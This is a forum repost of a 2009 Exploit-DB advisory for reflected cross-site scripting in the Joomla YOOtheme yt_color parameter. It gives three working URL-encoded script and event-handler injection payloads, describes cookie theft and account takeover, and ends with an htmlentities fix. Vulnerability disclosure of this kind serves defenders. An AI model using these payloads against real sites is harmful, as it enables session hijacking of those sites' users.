Exploit Joomla! Component yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10318
Проверка EDB
  1. Пройдено
Автор
ANDRESG888
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2009-12-04
Код:
##########################[andresg888]##########################
# Exploit Title : Joomla yt_color YOOOtheme [xss, cookie stealing]
# Date : 2009-12-04
# Author : andresg888
# Software Link : http://www.yootheme.com/
# Contact : andresg888[4t]gmail[dot]com
# Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org
# Dork : No DoRk f0R ScRipT KiDDieS
########################################################################
# The GET variable yt_color can be set to any script
########################################################################
# Example 1: index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
# Example 2: index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
# Example 3: The GET variable yt_color can be set to "+onmouseover=alert(123456)+
########################################################################
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable
# application to fool a user in order to gather data from them. An attacker can steal the
# session cookie and take over the account.
########################################################################
# Solution:
# Use htmlentities() or htmlspecialchars() functions.
# Solution Example : $name=htmlentities($_GET['name'])
########################################################################
# Greetz : _84kur10_ , Brunos_50, mmrg5486, LU73K, Joshu4X, 3l_d105_4r35
# Special Thanks : all members from ilegalintrusion & black-portal
##########################[andresg888]#################################
 
Источник
www.exploit-db.com

Похожие темы